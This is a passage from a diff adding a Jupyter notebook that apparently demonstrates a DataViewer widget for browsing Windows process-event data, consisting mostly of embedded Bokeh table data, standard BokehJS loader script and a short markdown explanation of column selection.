Aj//uEdkIA8E8D/IR2QgAATA38hHZCABBNDfyEdkIAsJ0N/IR2QgAAyQ38hHZCAABEMv2EdkIAEEUy/YR2QgCwuDL9hHZCAHDBMv2EdkIAwHs1/YR2QgCQfDX9hHZCAADX4fuEdkIAEAHw+4R2QgDgAfD7hHZCAABV8PuEdkIAoH3w+4R2QgAA84n7hHZCAHAcmPuEdkIAsB2Y+4R2QgDgfJj7hHZCAACZmPuEdkIAcOhe/4R2QgBw6V7/hHZCAHBcX/+EdkIAcGVf/4R2QgAAC27/hHZCAABLmf2EdkIAAHSn/YR2QgBAdaf9hHZCANDYp/2EdkIA0PGn/YR2QgAQfA7+hHZCADCkHP6EdkIAEKUc/oR2QgAw+Rz+hHZCAAAhHf6EdkIAABNJ/oR2QgAAPFf+hHZCAEA9V/6EdkIA0K5X/oR2QgBwuVf+hHZCAHDHK/6EdkIAAEgy/oR2QgAA8Dn+hHZCALDxOf6EdkIA0EA6/oR2QgAwbTr+hHZCAED6Ov6EdkIA4Po6/oR2QgAA49P9hHZCADAM4v2EdkIAQA3i/YR2QgAgaeL9hHZCAACJ4v2EdkIAAJe2/YR2QgAwwMT9hHZCAEDBxP2EdkIAUCHF/YR2QgBwPcX9hHZCAAAv8f2EdkIA0Fj//YR2QgDgWf/9hHZCADCx//2EdkIAoNX//YR2QgCwCkH9hHZCAHBnQf2EdkIA0O1B/YR2QgAQkU/9hHZCABCST/2EdkIAgABQ/YR2QgBwDVD9hHZC\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[363]},\"TokenElevationType\":[\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\"],\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362]},\"selected\":{\"id\":\"1319\"},\"selection_policy\":{\"id\":\"1320\"}},\"id\":\"1249\",\"type\":\"ColumnDataSource\"},{\"attributes\":{},\"id\":\"1332\",\"type\":\"StringFormatter\"},{\"attributes\":{\"editor\":{\"id\":\"1325\"},\"field\":\"TimeGenerated\",\"formatter\":{\"id\":\"1279\"},\"title\":\"TimeGenerated\",\"width\":50},\"id\":\"1280\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1319\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"1323\",\"type\":\"StringFormatter\"},{\"attributes\":{\"editor\":{\"id\":\"1331\"},\"field\":\"CommandLine\",\"formatter\":{\"id\":\"1330\"},\"title\":\"CommandLine\",\"width\":125},\"id\":\"1277\",\"type\":\"TableColumn\"},{\"attributes\":{\"editor\":{\"id\":\"1329\"},\"field\":\"NewProcessName\",\"formatter\":{\"id\":\"1328\"},\"title\":\"NewProcessName\",\"width\":52},\"id\":\"1276\",\"type\":\"TableColumn\"}],\"root_ids\":[\"1271\"]},\"title\":\"Bokeh Application\",\"version\":\"2.3.2\"}};\n",
+       "  var render_items = [{\"docid\":\"dd9cf645-1572-400f-9714-dd67b652feb7\",\"notebook_comms_target\":\"1334\",\"root_ids\":[\"1271\"],\"roots\":{\"1271\":\"b150951c-1d9c-43d4-b23b-0e0baa1e8441\"}}];\n",
+       "  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n",
+       "\n",
+       "  }\n",
+       "  if (root.Bokeh !== undefined) {\n",
+       "    embed_document(root);\n",
+       "  } else {\n",
+       "    var attempts = 0;\n",
+       "    var timer = setInterval(function(root) {\n",
+       "      if (root.Bokeh !== undefined) {\n",
+       "        clearInterval(timer);\n",
+       "        embed_document(root);\n",
+       "      } else {\n",
+       "        attempts++;\n",
+       "        if (attempts > 100) {\n",
+       "          clearInterval(timer);\n",
+       "          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n",
+       "        }\n",
+       "      }\n",
+       "    }, 10, root)\n",
+       "  }\n",
+       "})(window);"
+      ],
+      "application/vnd.bokehjs_exec.v0+json": ""
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "1271"
+      }
+     },
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "50d5ff5100bd40b4a05dc32b98c45991",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "Accordion(children=(VBox(children=(VBox(children=(Text(value='', description='Filter:', style=DescriptionStyle…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "columns = [\n",
+    "    \"Account\",\n",
+    "    \"EventID\",\n",
+    "    \"TimeGenerated\",\n",
+    "    \"Computer\",\n",
+    "    \"NewProcessName\",\n",
+    "    \"CommandLine\",\n",
+    "    \"ParentProcessName\",\n",
+    "]\n",
+    "DataViewer(data, selected_cols=columns)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Use \"Choose columns\" to select which columns to display\n",
+    "\n",
+    "The right side list contains the available columns in the DataFrame,\n",
+    "the left side is the list of columns to display.\n",
+    "\n",
+    "Use the Add/Remove buttons to add or remove columns from the selected set.\n",
+    "You can select multiple columns using Ctrl+Click or Shift+Click (the\n",
+    "former selects or deselects an item for each click, the latter selects\n",
+    "a range of items between the last item selected and the currently-clicked\n",
+    "item).\n",
+    "\n",
+    "Click on Apply columns to update the data view."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 4,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/javascript": [
+       "\n",
+       "(function(root) {\n",
+       "  function now() {\n",
+       "    return new Date();\n",
+       "  }\n",
+       "\n",
+       "  var force = true;\n",
+       "\n",
+       "  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n",
+       "    root._bokeh_onload_callbacks = [];\n",
+       "    root._bokeh_is_loading = undefined;\n",
+       "  }\n",
+       "\n",
+       "  var JS_MIME_TYPE = 'application/javascript';\n",
+       "  var HTML_MIME_TYPE = 'text/html';\n",
+       "  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n",
+       "  var CLASS_NAME = 'output_bokeh rendered_html';\n",
+       "\n",
+       "  /**\n",
+       "   * Render data to the DOM node\n",
+       "   */\n",
+       "  function render(props, node) {\n",
+       "    var script = document.createElement(\"script\");\n",
+       "    node.appendChild(script);\n",
+       "  }\n",
+       "\n",
+       "  /**\n",
+       "   * Handle when an output is cleared or removed\n",
+       "   */\n",
+       "  function handleClearOutput(event, handle) {\n",
+       "    var cell = handle.cell;\n",
+       "\n",
+       "    var id = cell.output_area._bokeh_element_id;\n",
+       "    var server_id = cell.output_area._bokeh_server_id;\n",
+       "    // Clean up Bokeh references\n",
+       "    if (id != null && id in Bokeh.index) {\n",
+       "      Bokeh.index[id].model.document.clear();\n",
+       "      delete Bokeh.index[id];\n",
+       "    }\n",
+       "\n",
+       "    if (server_id !== undefined) {\n",
+       "      // Clean up Bokeh references\n",
+       "      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n",
+       "      cell.notebook.kernel.execute(cmd, {\n",
+       "        iopub: {\n",
+       "          output: function(msg) {\n",
+       "            var id = msg.content.text.trim();\n",
+       "            if (id in Bokeh.index) {\n",
+       "              Bokeh.index[id].model.document.clear();\n",
+       "              delete Bokeh.index[id];\n",
+       "            }\n",
+       "          }\n",
+       "        }\n",
+       "      });\n",
+       "      // Destroy server and session\n",
+       "      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n",
+       "      cell.notebook.kernel.execute(cmd);\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  /**\n",
+       "   * Handle when a new output is added\n",
+       "   */\n",
+       "  function handleAddOutput(event, handle) {\n",
+       "    var output_area = handle.output_area;\n",
+       "    var output = handle.output;\n",
+       "\n",
+       "    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n",
+       "    if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n",
+       "      return\n",
+       "    }\n",
+       "\n",
+       "    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n",
+       "\n",
+       "    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n",
+       "      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n",
+       "      // store reference to embed id on output_area\n",
+       "      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n",
+       "    }\n",
+       "    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n",
+       "      var bk_div = document.createElement(\"div\");\n",
+       "      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n",
+       "      var script_attrs = bk_div.children[0].attributes;\n",
+       "      for (var i = 0; i < script_attrs.length; i++) {\n",
+       "        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n",
+       "        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n",
+       "      }\n",
+       "      // store reference to server id on output_area\n",
+       "      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  function register_renderer(events, OutputArea) {\n",
+       "\n",
+       "    function append_mime(data, metadata, element) {\n",
+       "      // create a DOM node to render to\n",
+       "      var toinsert = this.create_output_subarea(\n",
+       "        metadata,\n",
+       "        CLASS_NAME,\n",
+       "        EXEC_MIME_TYPE\n",
+       "      );\n",
+       "      this.keyboard_manager.register_events(toinsert);\n",
+       "      // Render to node\n",
+       "      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n",
+       "      render(props, toinsert[toinsert.length - 1]);\n",
+       "      element.append(toinsert);\n",
+       "      return toinsert\n",
+       "    }\n",
+       "\n",
+       "    /* Handle when an output is cleared or removed */\n",
+       "    events.on('clear_output.CodeCell', handleClearOutput);\n",
+       "    events.on('delete.Cell', handleClearOutput);\n",
+       "\n",
+       "    /* Handle when a new output is added */\n",
+       "    events.on('output_added.OutputArea', handleAddOutput);\n",
+       "\n",
+       "    /**\n",
+       "     * Register the mime type and append_mime function with output_area\n",
+       "     */\n",
+       "    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n",
+       "      /* Is output safe? */\n",
+       "      safe: true,\n",
+       "      /* Index of renderer in `output_area.display_order` */\n",
+       "      index: 0\n",
+       "    });\n",
+       "  }\n",
+       "\n",
+       "  // register the mime type if in Jupyter Notebook environment and previously unregistered\n",
+       "  if (root.Jupyter !== undefined) {\n",
+       "    var events = require('base/js/events');\n",
+       "    var OutputArea = require('notebook/js/outputarea').OutputArea;\n",
+       "\n",
+       "    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n",
+       "      register_renderer(events, OutputArea);\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  \n",
+       "  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n",
+       "    root._bokeh_timeout = Date.now() + 5000;\n",
+       "    root._bokeh_failed_load = false;\n",
+       "  }\n",
+       "\n",
+       "  var NB_LOAD_WARNING = {'data': {'text/html':\n",
+       "     \"<div style='background-color: #fdd'>\\n\"+\n",
+       "     \"<p>\\n\"+\n",
+       "     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n",
+       "     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n",
+       "     \"</p>\\n\"+\n",
+       "     \"<ul>\\n\"+\n",
+       "     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n",
+       "     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n",
+       "     \"</ul>\\n\"+\n",
+       "     \"<code>\\n\"+\n",
+       "     \"from bokeh.resources import INLINE\\n\"+\n",
+       "     \"output_notebook(resources=INLINE)\\n\"+\n",
+       "     \"</code>\\n\"+\n",
+       "     \"</div>\"}};\n",
+       "\n",
+       "  function display_loaded() {\n",
+       "    var el = document.getElementById(null);\n",
+       "    if (el != null) {\n",
+       "      el.textContent = \"BokehJS is loading...\";\n",
+       "    }\n",
+       "    if (root.Bokeh !== undefined) {\n",
+       "      if (el != null) {\n",
+       "        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n",
+       "      }\n",
+       "    } else if (Date.now() < root._bokeh_timeout) {\n",
+       "      setTimeout(display_loaded, 100)\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "\n",
+       "  function run_callbacks() {\n",
+       "    try {\n",
+       "      root._bokeh_onload_callbacks.forEach(function(callback) {\n",
+       "        if (callback != null)\n",
+       "          callback();\n",
+       "      });\n",
+       "    } finally {\n",
+       "      delete root._bokeh_onload_callbacks\n",
+       "    }\n",
+       "    console.debug(\"Bokeh: all callbacks have finished\");\n",
+       "  }\n",
+       "\n",
+       "  function load_libs(css_urls, js_urls, callback) {\n",
+       "    if (css_urls == null) css_urls = [];\n",
+       "    if (js_urls == null) js_urls = [];\n",
+       "\n",
+       "    root._bokeh_onload_callbacks.push(callback);\n",
+       "    if (root._bokeh_is_loading > 0) {\n",
+       "      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n",
+       "      return null;\n",
+       "    }\n",
+       "    if (js_urls == null || js_urls.length === 0) {\n",
+       "      run_callbacks();\n",
+       "      return null;\n",
+       "    }\n",
+       "    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n",
+       "    root._bokeh_is_loading = css_urls.length + js_urls.length;\n",
+       "\n",
+       "    function on_load() {\n",
+       "      root._bokeh_is_loading--;\n",
+       "      if (root._bokeh_is_loading === 0) {\n",
+       "        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n",
+       "        run_callbacks()\n",
+       "      }\n",
+       "    }\n",
+       "\n",
+       "    function on_error(url) {\n",
+       "      console.error(\"failed to load \" + url);\n",
+       "    }\n",
+       "\n",
+       "    for (let i = 0; i < css_urls.length; i++) {\n",
+       "      const url = css_urls[i];\n",
+       "      const element = document.createElement(\"link\");\n",
+       "      element.onload = on_load;\n",
+       "      element.onerror = on_error.bind(null, url);\n",
+       "      element.rel = \"stylesheet\";\n",
+       "      element.type = \"text/css\";\n",
+       "      element.href = url;\n",
+       "      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n",
+       "      document.body.appendChild(element);\n",
+       "    }\n",
+       "\n",
+       "    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\": \"XypntL49z55iwGVUW4qsEu83zKL3XEcz0MjuGOQ9SlaaQ68X/g+k1FcioZi7oQAc\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\": \"bEsM86IHGDTLCS0Zod8a8WM6Y4+lafAL/eSiyQcuPzinmWNgNO2/olUF0Z2Dkn5i\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\": \"TX0gSQTdXTTeScqxj6PVQxTiRW8DOoGVwinyi1D3kxv7wuxQ02XkOxv0xwiypcAH\"};\n",
+       "\n",
+       "    for (let i = 0; i < js_urls.length; i++) {\n",
+       "      const url = js_urls[i];\n",
+       "      const element = document.createElement('script');\n",
+       "      element.onload = on_load;\n",
+       "      element.onerror = on_error.bind(null, url);\n",
+       "      element.async = false;\n",
+       "      element.src = url;\n",
+       "      if (url in hashes) {\n",
+       "        element.crossOrigin = \"anonymous\";\n",
+       "        element.integrity = \"sha384-\" + hashes[url];\n",
+       "      }\n",
+       "      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n",
+       "      document.head.appendChild(element);\n",
+       "    }\n",
+       "  };\n",
+       "\n",
+       "  function inject_raw_css(css) {\n",
+       "    const element = document.createElement(\"style\");\n",
+       "    element.appendChild(document.createTextNode(css));\n",
+       "    document.body.appendChild(element);\n",
+       "  }\n",
+       "\n",
+       "  \n",
+       "  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\"];\n",
+       "  var css_urls = [];\n",
+       "  \n",
+       "\n",
+       "  var inline_js = [\n",
+       "    function(Bokeh) {\n",
+       "      Bokeh.set_log_level(\"info\");\n",
+       "    },\n",
+       "    function(Bokeh) {\n",
+       "    \n",
+       "    \n",
+       "    }\n",
+       "  ];\n",
+       "\n",
+       "  function run_inline_js() {\n",
+       "    \n",
+       "    if (root.Bokeh !== undefined || force === true) {\n",
+       "      \n",
+       "    for (var i = 0; i < inline_js.length; i++) {\n",
+       "      inline_js[i].call(root, root.Bokeh);\n",
+       "    }\n",
+       "    } else if (Date.now() < root._bokeh_timeout) {\n",
+       "      setTimeout(run_inline_js, 100);\n",
+       "    } else if (!root._bokeh_failed_load) {\n",
+       "      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n",
+       "      root._bokeh_failed_load = true;\n",
+       "    } else if (force !== true) {\n",
+       "      var cell = $(document.getElementById(null)).parents('.cell').data().cell;\n",
+       "      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n",
+       "    }\n",
+       "\n",
+       "  }\n",
+       "\n",
+       "  if (root._bokeh_is_loading === 0) {\n",
+       "    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n",
+       "    run_inline_js();\n",
+       "  } else {\n",
+       "    load_libs(css_urls, js_urls, function() {\n",
+       "      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n",
+       "      run_inline_js();\n",
+       "    });\n",
+       "  }\n",
+       "}(window));"
+      ],
+      "application/vnd.bokehjs_load.v0+json": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  \n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(null);\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error(url) {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (let i = 0; i < css_urls.length; i++) {\n      const url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\": \"XypntL49z55iwGVUW4qsEu83zKL3XEcz0MjuGOQ9SlaaQ68X/g+k1FcioZi7oQAc\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\": \"bEsM86IHGDTLCS0Zod8a8WM6Y4+lafAL/eSiyQcuPzinmWNgNO2/olUF0Z2Dkn5i\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\": \"TX0gSQTdXTTeScqxj6PVQxTiRW8DOoGVwinyi1D3kxv7wuxQ02XkOxv0xwiypcAH\"};\n\n    for (let i = 0; i < js_urls.length; i++) {\n      const url = js_urls[i];\n      const element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified 